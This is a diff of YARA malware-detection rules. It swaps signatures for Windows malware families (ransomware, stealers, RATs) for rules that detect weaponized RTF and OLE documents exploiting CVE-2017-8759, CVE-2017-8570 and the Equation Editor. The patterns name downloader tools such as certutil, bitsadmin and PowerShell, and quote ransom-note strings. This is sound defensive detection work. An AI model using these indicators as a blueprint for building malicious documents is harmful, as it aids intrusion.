+                         0d 0a 37 0d 0a 39 0d 0a 66 0d 0a 39 0d 0a 62 0d
+                         0a 61 0d 0a 63 0d 0a 65 0d 0a 31 0d 0a 31 0d 0a
+                         38 0d 0a 63 0d 0a 38 0d 0a 32 0d 0a 30 0d 0a 30
+                         0d 0a 61 0d 0a 61 0d 0a 30 0d 0a 30 0d 0a 34 0d
+                         0a 62 0d 0a 61 0d 0a 39 0d 0a 30 0d 0a 62 }
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31" ascii nocase
+		$ole5 = { 64 0a 30 0a 63 0a 66 0a 31 0a 31 0a 65 0a 30 }
+		$ole6 = { 64 0d 0a 30 0d 0a 63 0d 0a 66 0d 0a 31 0d 0a 31 0d 0a 65 0d 0a 30 }
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $c* ) or 4 of ( $s* ) or ( 1 of ( $d* ) and ( 3 of ( $c* ) or 2 of ( $s* ) ) ) )
+		uint32( 0 ) == 0x74725c7b and 1 of ( $urlmoniker* ) and 1 of ( $ole* ) and 1 of ( $obj* )
 }
-
-rule DITEKSHEN_MALWARE_Win_Floodfix : FILE
+rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_8759_1 : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects FloodFix"
+		description = "detects CVE-2017-8759 weaponized RTF documents."
 		author = "ditekSHen"
-		id = "b05b0b40-0de8-58a0-889e-44a12d346de4"
+		id = "8f873145-b909-5185-9f85-07c820d1f38e"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8213-L8219"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L215-L238"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7da820b00ef5ee2e943b012cfa57421a39f8a7bfc627cc1909151a47092a26d"
+		logic_hash = "595dc0153a2349fbd4f92dd544a3dfd05715059dd639653e7c7e6ac80624360e"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = "CVE-2017-8759, FILE"
+
+	strings:
+		$clsid1 = { 00 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$clsid2 = { 00 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$clsid3 = "0003000000000000c000000000000046" ascii nocase
+		$clsid4 = "4f4c45324c696e6b" ascii nocase
+		$clsid5 = "OLE2Link" ascii nocase
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$s1 = "wsdl=http" wide
+		$s2 = "METAFILEPICT" ascii
+		$s3 = "INCLUDEPICTURE \"http" ascii
+		$s4 = "!This program cannot be run in DOS mode" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) ) and pe.exports ( "crc32" )
+		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and 2 of ( $s* )
 }
-rule DITEKSHEN_MALWARE_Win_UNK_Infostealer : FILE
+rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects unknown information stealer"
+		description = "detects CVE-2017-8759 weaponized RTF documents."
 		author = "ditekSHen"
-		id = "f6f9816f-79bd-527c-9c0f-24e09c95ae35"
+		id = "92c8f45e-3792-51b3-bda4-7e9eae0e9a80"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8221-L8246"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L240-L268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca57ebf4b56020d278ec8a7e721c72de7a1f925a8e7f1f3a9edc8a70b88ff9d1"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		snort_sid = "920263"
-		hash1 = "b7a2cb34d3bc42d6d4c9d9af7dd406e2a5caef8ea46e5d09773feeb9920a6b21"
-		hash2 = "dd95377842932d77e225b126749e1e6e8ecd6f5c6540d084a551a80a54d02d7d"
-		hash3 = "12f790d9a0775b5e62effc6ea9e55bbef345fffbfb2f671f85098c4f7661dd0f"
-		hash4 = "0a4cea763dffde451c75a434143fc5d014c32c6d1f8f34920ea5f2854e62118f"
+		logic_hash = "15c9a5cfce5d1a797bab049352d8506b8bc112cabe2f510019f5d203690419e8"
+		score = 40
+		quality = 25
+		tags = "CVE-2017-8759, FILE"
 
 	strings:
-		$s1 = "%s\\%s\\%s-Qt" fullword wide
-		$s2 = "%s\\%s.json" fullword wide
-		$s3 = "*.mmd*" fullword wide
-		$s4 = "%s\\%s.vdf" fullword wide
-		$s5 = "%-50s %s" fullword wide
-		$s6 = "dISCORD|lOCAL" fullword ascii nocase
-		$s7 = "sTORAGE|LEVELDB" fullword ascii nocase
-		$s8 = ".coin" fullword ascii
-		$s9 = ".emc" fullword ascii
-		$s10 = ".lib" fullword ascii
-		$s11 = ".bazar" fullword ascii
-		$s12 = "id=%d" fullword ascii
-		$s13 = "2:?/v /v /v /^Y" fullword ascii
+		$clsid1 = { 88 d9 6a 0c f1 92 11 d4 a6 5f 00 40 96 32 51 e5 }
+		$clsid2 = "88d96a0cf19211d4a65f0040963251e5" ascii nocase
+		$clsid3 = "4d73786d6c322e534158584d4c5265616465722e" ascii nocase
+		$clsid4 = "Msxml2.SAXXMLReader." ascii nocase
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\objclass htmlfile" ascii
+		$soap1 = "c7b0abec197fd211978e0000f8757e" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and ( 2 of ( $obj* ) or 1 of ( $soap* ) )
 }
-rule DITEKSHEN_MALWARE_Win_DECAF : FILE
+rule DITEKSHEN_INDICATOR_RTF_Exploit_Scripting : CVE_2017_8759 CVE_2017_8570 FILE
 {
 	meta:
-		description = "Detects DECAF ransomware"
+		description = "detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents."
 		author = "ditekSHen"
-		id = "c6e4ce00-0be9-572d-987c-c47d699002f0"
+		id = "e8fd1231-3ef5-5b0b-987c-f55337804da3"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8248-L8268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L270-L302"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5d79a4f310fb00022eb9d636f161227e84a7e15517c4d2c39acafa7d81af5c2a"
+		logic_hash = "a1f4c833f0132dcbe2b3677d6ac0f3597c152702515375d60d4332c21183bd76"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = "CVE-2017-8759, CVE-2017-8570, FILE"
 
 	strings:
-		$s1 = "main.EncWorker" fullword ascii
-		$s2 = "Paths2Encrypt" fullword ascii
-		$s3 = "/cmd/encryptor/main.go" ascii
-		$s4 = "*win.FileUtils; .autotmp_41 *lib.Encryptor; .autotmp_" ascii
-		$s5 = "\"Microsoft Window" fullword wide
-		$s6 = "Legal_Policy_Statement" fullword wide
-		$s7 = ").Encrypt." ascii
-		$s8 = "*struct { F uintptr; pw *os.File; c *" ascii
-		$s9 = ".ListFilesToEnc." ascii
-		$m1 = "WINNER WINNER CHICKEN DINNER" ascii
-		$m2 = "All your servers and computers are encrypted" ascii
-		$m3 = "We guarantee to decrypt one image file for free." ascii
-		$m4 = "We WILL NOT be able to RESTORE them." ascii
+		$clsid1 = { 00 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$clsid2 = "0003000000000000c000000000000046" ascii nocase
+		$clsid3 = "4f4c45324c696e6b" ascii nocase
+		$clsid4 = "OLE2Link" ascii nocase
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$ole5 = { 64 30 63 66 [0-2] 31 31 65 30 61 31 62 31 31 61 65 31 }
+		$ole6 = "D0cf11E" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
+		$obj8 = "\\objclass htmlfile" ascii
+		$sct1 = { 33 (43|63) (3533|3733) (3433|3633) (3532|3732) (3439|3639)( 3530|3730) (3534|3734) (3443|3643) (3435|3635) (3534|3734) }
+		$sct2 = { (3737|3537) (3733|3533) (3633|3433) (3732|3532) (3639|3439) (3730|3530) (3734|3534) (3245|3265) (3733|3533) (3638|3438) (3635|3435) (3643|3443) (3643|3443) }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 3 of ( $m* ) or ( 1 of ( $m* ) and 2 of ( $s* ) ) )
+		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and 1 of ( $obj* ) and 1 of ( $sct* )
 }
-
-rule DITEKSHEN_MALWARE_Win_Windealer : FILE
+rule DITEKSHEN_INDICATOR_RTF_Embedded_Excel_Sheetmacroenabled : FILE
 {
 	meta:
-		description = "Detects WinDealer"
+		description = "Detects RTF documents embedding an Excel sheet with macros enabled. Observed in exploit followed by dropper behavior"
 		author = "ditekSHen"
-		id = "d4f3b0cc-121e-5032-9721-1e2a86842fa5"
+		id = "342d10b3-61d2-5fcb-8f4f-1fe45049257b"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8270-L8301"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L304-L328"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eabc41ea69f142ee7c243cbc75ceda909a722be382ad91a01c805aef637be915"
+		logic_hash = "cc3b52e549c2697c6e0a2fea365d193311d90d26854bd2fe321aa26c118975a0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920264"
 
 	strings:
-		$d1 = "downfile" fullword ascii
-		$d2 = "getmypath" fullword ascii
-		$d3 = "content-type: monitor" fullword ascii
-		$d4 = "content-type: UsedType" fullword ascii
-		$d5 = "write command error" fullword ascii
-		$d6 = "C:\\WINDOWS\\system32\\kernel32.dll" fullword ascii
-		$l1 = "currentconfig" fullword ascii
-		$l2 = "remotedomain" fullword ascii
-		$l3 = "reserveip" fullword ascii
-		$l4 = "otherinfo" fullword ascii
-		$l5 = "filelen" fullword ascii
-		$l6 = "%s%s.bak" fullword wide
-		$l7 = "localmachine" fullword ascii
-		$l8 = "remoteip" fullword ascii
-		$l9 = "datastate" fullword ascii
-		$l10 = "SYSTEM\\CurrentControlSet\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\%s\\Connection" fullword ascii
-		$s1 = "%s\\%s\\V5_History.dat" fullword wide
-		$s2 = "%s\\%s\\history2.dat" fullword wide
-		$s3 = "%s\\%s\\history.imw" fullword wide
-		$s4 = "%s\\%s\\main.imw" fullword wide
-		$s5 = "%s%d.%d.%d.%dWindows/%u" fullword ascii
-		$s6 = "%s\\%c_%s_tmp" fullword wide
-		$s7 = "%s\\%s\\main.db" fullword wide
+		$ex1 = "457863656c2e53686565744d6163726f456e61626c65642e" ascii nocase
+		$ex2 = "0002083200000000c000000000000046" ascii nocase
+		$ex3 = "Excel.SheetMacroEnabled." ascii
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $d* ) and 1 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $d* ) ) or 6 of ( $l* ) or ( pe.exports ( "DealC" ) and pe.exports ( "DealR" ) and pe.exports ( "DealS" ) and 1 of them ) )
+		uint32( 0 ) == 0x74725c7b and ( 1 of ( $ex* ) and 1 of ( $ole* ) and 2 of ( $obj* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Exmatter : FILE
+rule DITEKSHEN_INDICATOR_OLE_Metadatacmd : FILE
 {
 	meta:
-		description = "Detects BlackMatter data exfiltration tool"
+		description = "Detects OLE documents with Windows command-line utilities commands (certutil, powershell, etc.) stored in the metadata (author, last modified by, etc.)."
 		author = "ditekSHen"
-		id = "93df7a68-1e19-5db3-95d4-39d77d1036d8"
+		id = "63b23630-b344-5fba-95f4-950d072beaff"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8303-L8325"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L330-L349"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "25a35c82919f96bdba00558616f574e901b83785713ed1a63a6f06df576777cd"
+		logic_hash = "0562d026a1ad4510310ebff5da154064f92afc7bf714973f7de362435476772c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "4a0e10e1e9fea0906379f99fa350b91c2af37f0fd2cc55491643cc71a9887d30"
-		hash2 = "a5e050f1278473d41c3a3d6f98f3fd82932f51a937bc57d8f5605815f0efb0f8"
 
 	strings:
-		$s1 = "Renci.SshNet." ascii
-		$s2 = "DirNotEmpty" fullword ascii
-		$s3 = "MkDir" fullword ascii
-		$s4 = "RmDir" fullword ascii
-		$s5 = "get_MainWindowHandle" fullword ascii
-		$s6 = "GetCurrentProcess" fullword ascii
-		$s7 = "]]>]]>" fullword wide
-		$s8 = "1.3.132.0.35" fullword wide
-		$s9 = "1.3.132.0.34" fullword wide
-		$s10 = "1.2.840.10045.3.1.7" fullword wide
-		$x1 = "sender2.pdb" fullword ascii
-		$x2 = { 64 00 61 00 74 00 61 00 ?? 72 00 6f 00 6f 00 74 }
-		$x3 = "157.230.28.192" fullword wide
+		$cmd1 = { 00 1E 00 00 00 [1-4] 00 00 (63|43) (6D|4D) (64|44) (00|20) }
+		$cmd2 = { 00 1E 00 00 00 [1-4] 00 00 (6D|4D) (73|53) (68|48) (74|54) (61|41) (00|20) }
+		$cmd3 = { 00 1E 00 00 00 [1-4] 00 00 (77|57) (73|53) (63|43) (72|52) (69|49) (70|50) (74|54) (00|20) }
+		$cmd4 = { 00 1E 00 00 00 [1-4] 00 00 (63|42) (65|45) (72|52) (74|54) (75|55) (74|54) (69|49) (6C|4C) (00|20) }
+		$cmd5 = { 00 1E 00 00 00 [1-4] 00 00 (70|50) (6F|4F) (77|57) (65|45) (72|52) (73|43) (68|48) (65|45) (6C|4C) (6C|4C) (00|20) }
+		$cmd6 = { 00 1E 00 00 00 [1-4] 00 00 (6E|4E) (65|45) (74|54) 2E (77|57) (65|45) (62|42) (63|43) (6C|4C) (69|49) (65|45) (6E|4E) (74|54) (00|20) }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $x* ) and 7 of ( $s* ) ) )
+		uint16( 0 ) == 0xcfd0 and any of them
 }
-rule DITEKSHEN_MALWARE_Win_Brbbot : FILE
+rule DITEKSHEN_INDICATOR_RTF_Equation_Bitsadmin_Downloader : FILE
 {
 	meta:
-		description = "Detects BrbBot"
+		description = "Detects RTF documents that references both Microsoft Equation Editor and BITSAdmin. Common exploit + dropper behavior."
 		author = "ditekSHen"
-		id = "d77dfdcf-4cd5-578e-99eb-c987e7b5b706"
+		id = "e96a6f18-9a5e-58ca-829e-c82b444ad403"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8327-L8345"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L428-L451"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "64df5bba698fbba1baf27eedb9a2eb46c5e0752996ea91900f8377200d54eeeb"
+		logic_hash = "39a07a0af243e929a6b3df48b6cf8a9d30bc8ef9e7deac494348945427b015e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920265"
+		snort2_sid = "910002-910003"
+		snort3_sid = "910001"
+		clamav_sig = "INDICATOR.RTF.EquationBITSAdminDownloader"
 
 	strings:
-		$x1 = "brbconfig.tmp" fullword ascii
-		$x2 = "brbbot" fullword ascii
-		$s1 = "%s?i=%s&c=%s&p=%s" fullword ascii
-		$s2 = "exec" fullword ascii
-		$s3 = "CONFIG" fullword ascii wide
-		$s4 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" fullword ascii
-		$s5 = { 43 4f 4e 46 49 47 00 00 65 6e 63 6f 64 65 00 00
-                73 6c 65 65 70 00 00 00 65 78 69 74 00 00 00 00
-                63 6f 6e 66 00 00 00 00 66 69 6c 65 00 00 00 00
-                65 78 65 63 }
+		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
+		$ba = "6269747361646d696e" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or all of ( $s* ) )
+		uint32( 0 ) == 0x74725c7b and ( ( $eq and $ba ) and 1 of ( $obj* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Babylonrat : FILE
+rule DITEKSHEN_INDICATOR_RTF_Equation_Certutil_Downloader : FILE
 {
 	meta:
-		description = "Detects BabylonRAT / CollectorStealer / ParadoxRAT"
+		description = "Detects RTF documents that references both Microsoft Equation Editor and CertUtil. Common exploit + dropper behavior."
 		author = "ditekSHen"
-		id = "7352e0cf-64ab-5ba4-afaf-04067a0046e8"
+		id = "a47f31f9-91fc-5009-8aff-2b9e334c3139"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8347-L8373"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L453-L476"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "352efb98e298e9f0ce17c20d44d193f2565ec559923210d80dec1a0988545a30"
+		logic_hash = "d6c62957ce40ed755a84bd9aa8900e4990c466097d6df55c539b289bf50fe94e"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		snort2_sid = "910006-910007"
+		snort3_sid = "910003"
+		clamav_sig = "INDICATOR.RTF.EquationCertUtilDownloader"
 
 	strings:
-		$x1 = "Babylon RAT Client" wide nocase
-		$x2 = "ParadoxRAT_Client" fullword ascii
-		$s1 = "@ConfigsEx" fullword wide
-		$s2 = "ClipBoard.txt" fullword wide
-		$s3 = "[%02d/%02d/%d %02d:%02d:%02d] [%s] (%s):" fullword wide
-		$s4 = "\\%Y %m %d - %I %M %p" fullword wide
-		$s5 = "[%02d/%02d/%d %02d:%02d:%02d] (%s)" fullword wide
-		$s6 = " c:\\Windows\\system32\\cmd.exe" fullword wide
-		$s7 = "Update Failed [OpenProcess]" wide
-		$s8 = "DoS Already Active..." fullword wide
-		$s9 = "File Downloaded and Execut" wide
-		$s10 = "LgDError33x98dGetProcAddress" fullword wide
-		$s11 = "@SPYNET" fullword wide
-		$s12 = "Recovery.Recovery" fullword wide
-		$s13 = "GetChrome" fullword wide
-		$s14 = "\\drivers\\etc\\HOSTS" fullword ascii
-		$s15 = "plugin-container.exe" fullword ascii
-		$s16 = "bss_server.usrRelay" fullword ascii
-		$s17 = "sckRelay" fullword ascii
+		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
+		$cu = "636572747574696c" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 8 of ( $s* ) )
+		uint32( 0 ) == 0x74725c7b and ( ( $eq and $cu ) and 1 of ( $obj* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Netsupport : FILE
+rule DITEKSHEN_INDICATOR_RTF_Equation_Powershell_Downloader : FILE
 {
 	meta:
-		description = "Detects NetSupport client"
+		description = "Detects RTF documents that references both Microsoft Equation Editor and PowerShell. Common exploit + dropper behavior."
 		author = "ditekSHen"
-		id = "958e82c5-aeac-58f4-b214-a9382b598cd9"
+		id = "5d1d65ef-e183-5a0d-a0fa-d0d5f09f21a1"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8375-L8386"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L478-L501"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4e8120d902fdee2a3f87c85bb6bb7d3bba79e3828500f297c2dc57d5213cf6a8"
+		logic_hash = "0b8b9b7b40f8b4d659de9e025a65d5c6b64c6066bb618a3e7ed3c318f70befe5"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920266-920267"
+		snort2_sid = "910004-910005"
+		snort3_sid = "910002"
+		clamav_sig = "INDICATOR.RTF.EquationPowerShellDownloader"
 
 	strings:
-		$s1 = ":\\nsmsrc\\nsm\\" fullword ascii
-		$s2 = "name=\"NetSupport Client Configurator\"" fullword ascii
-		$s3 = "<description>NetSupport Manager Remote Control.</description>" fullword ascii
+		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
+		$ps = "706f7765727368656c6c" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint32( 0 ) == 0x74725c7b and ( ( $ps and $eq ) and 1 of ( $obj* ) )
 }
-
-rule DITEKSHEN_MALWARE_Win_Gobrutloader : FILE
+rule DITEKSHEN_INDICATOR_RTF_LNK_Shell_Explorer_Execution : FILE
 {
 	meta:
-		description = "Detects GoBrut StealthWorker laoder"
+		description = "detects RTF files with Shell.Explorer.1 OLE objects with embedded LNK files referencing an executable."
 		author = "ditekSHen"
-		id = "748f8055-71d9-5757-8eb0-90dc3ee35c74"
+		id = "2cac4dd8-086a-5220-a658-94cedd9cf7c3"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8388-L8394"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L503-L517"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6241117cffb147763ace41b36cd1524f48bfc7cb06d56a82d7b30bec9e1baf5b"
+		logic_hash = "4c11a37425e260692e11dc8fca317611106245d1590081a7038036ad568702f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
+	strings:
+		$clsid = "c32ab2eac130cf11a7eb0000c05bae0b" ascii nocase
+		$lnk_header = "4c00000001140200" ascii nocase
+		$http_url = "6800740074007000" ascii nocase
+		$file_url = "660069006c0065003a" ascii nocase
+
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.exports ( "@SetFirstEverVice@8" )
+		uint32( 0 ) == 0x74725c7b and filesize < 1500KB and $clsid and $lnk_header and ( $http_url or $file_url )
 }
-rule DITEKSHEN_MALWARE_Win_Milan : FILE
+rule DITEKSHEN_INDICATOR_RTF_Forms_HTML_Execution : FILE
 {
 	meta:
-		description = "Detects Milan Lyceum backdoor"
+		description = "detects RTF files with Forms.HTML:Image.1 or Forms.HTML:Submitbutton.1 OLE objects referencing file or HTTP URLs."
 		author = "ditekSHen"
-		id = "2ea0775b-65d4-58b9-9af9-c07f29742627"
+		id = "26b21c94-9192-53be-808b-b553f87769e1"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8396-L8467"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L519-L533"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "102af43be7cc3d873fbce78c95c767ebb6aadb2e7084b48f3cf48c11071d7a71"
+		logic_hash = "5e8a2072971c40d6fbc0e0265a9adfbe4faa04d0f3c6962fda443da33aa06906"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "21ab4357262993a042c28c1cdb52b2dab7195a6c30fa8be723631604dd330b29"
-		hash2 = "a2754d7995426b58317e437f8ed6770cd7bb7b18d971e23b2b300b75e34fa086"
-		hash3 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249"
-		hash4 = "b54a67062bdcd32dfa9f3d7b69780d2e6e4925777290bc34e8f979a1b4b72ea2"
-		hash5 = "b766522dd4189fef7775d663e5649ba9d8be8e03022039d20848fcbc3643e5f2"
-		hash6 = "d3606e2e36db0a0cb1b8168423188ee66332cae24fe59d63f93f5f53ab7c3029"
-		hash7 = "857e2f63a1078d49adc59a03482f7b362563f16fb251f174bdaa7759ed47922a"
-		hash8 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248"
 
 	strings:
